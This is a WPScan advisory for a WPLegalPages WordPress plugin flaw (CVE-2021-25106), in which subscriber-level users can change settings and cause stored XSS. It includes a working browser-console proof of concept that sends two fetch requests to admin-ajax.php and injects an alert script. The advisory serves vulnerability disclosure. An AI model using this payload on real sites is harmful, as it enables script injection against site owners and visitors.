WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPLegalPages < 2.7.1 - Subscriber+ Arbitrary Settings Update to Stored XSS

Description

The plugin does not check for authorisation and has a flawed CSRF logic when saving its settings, allowing any authenticated users, such as subscriber, to update them. Furthermore, due to the lack of sanitisation and escaping, it could lead to Stored Cross-Site Scripting

Proof of Concept

Run the below command in the web developer console of the web browser when being authenticated as any user

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"lp_save_admin_settings", "lp-cookie-bar": "ON"}),
  "method": "POST",
  "credentials": "include"
});fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({"action":"save_cookie_bar_form", "lp-cookie-button-text": "I agree');alert(/XSS/);//"}),
  "method": "POST",
  "credentials": "include"
});

The XSS will be triggered in all frontend pages

Affects Plugins

wplegalpages
Fixed in version 2.7.1

References

CVE
CVE-2021-25106

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
47df802d-5200-484b-959c-9f569edf992e

Timeline

Publicly Published

2022-01-05 (about 1 years ago)

Added

2022-01-05 (about 1 years ago)

Last Updated

2022-04-08 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin